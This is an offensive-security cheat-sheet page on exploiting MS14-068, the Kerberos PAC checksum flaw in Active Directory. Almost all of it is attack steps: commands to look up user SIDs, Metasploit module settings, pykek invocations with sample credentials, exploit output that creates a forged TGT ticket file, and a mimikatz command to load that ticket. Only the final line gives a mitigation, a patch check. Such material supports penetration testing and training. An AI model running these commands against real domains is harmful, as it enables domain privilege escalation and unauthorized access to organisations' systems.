3.8 KiB
3.8 KiB
MS14-068 Checksum Validation
This exploit require to know the user SID, you can use rpcclient
to remotely get it or wmi
if you have an access on the machine.
- RPCClient
rpcclient $> lookupnames john.smith john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
- WMI
wmic useraccount get name,sid Administrator S-1-5-21-3415849876-833628785-5197346142-500 Guest S-1-5-21-3415849876-833628785-5197346142-501 Administrator S-1-5-21-297520375-2634728305-5197346142-500 Guest S-1-5-21-297520375-2634728305-5197346142-501 krbtgt S-1-5-21-297520375-2634728305-5197346142-502 lambda S-1-5-21-297520375-2634728305-5197346142-1110
- Powerview
Convert-NameToSid high-sec-corp.localkrbtgt S-1-5-21-2941561648-383941485-1389968811-502
- netexec:
netexec ldap DC1.lab.local -u username -p password -k --get-sid
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
Generate a ticket with metasploit
or pykek
Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN LABDOMAIN.LOCAL yes The Domain (upper case) Ex: DEMO.LOCAL
PASSWORD P@ssw0rd yes The Domain User password
RHOSTS 10.10.10.10 yes The target address range or CIDR identifier
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish connection and read data
USER lambda yes The Domain User
USER_SID S-1-5-21-297520375-2634728305-5197346142-1106 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
# Alternative download: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
$ git clone https://github.com/SecWiki/windows-kernel-exploits
$ python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
$ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
$ python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
$ python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066
-1105
[+] Building AS-REQ for msfdc01.metasploitable.local... Done!
[+] Sending AS-REQ to msfdc01.metasploitable.local... Done!
[+] Receiving AS-REP from msfdc01.metasploitable.local... Done!
[+] Parsing AS-REP from msfdc01.metasploitable.local... Done!
[+] Building TGS-REQ for msfdc01.metasploitable.local... Done!
[+] Sending TGS-REQ to msfdc01.metasploitable.local... Done!
[+] Receiving TGS-REP from msfdc01.metasploitable.local... Done!
[+] Parsing TGS-REP from msfdc01.metasploitable.local... Done!
[+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done!
Then use mimikatz
to load the ticket.
mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
Mitigations
- Ensure the DCPromo process includes a patch QA step before running DCPromo that checks for installation of KB3011780. The quick and easy way to perform this check is with PowerShell: get-hotfix 3011780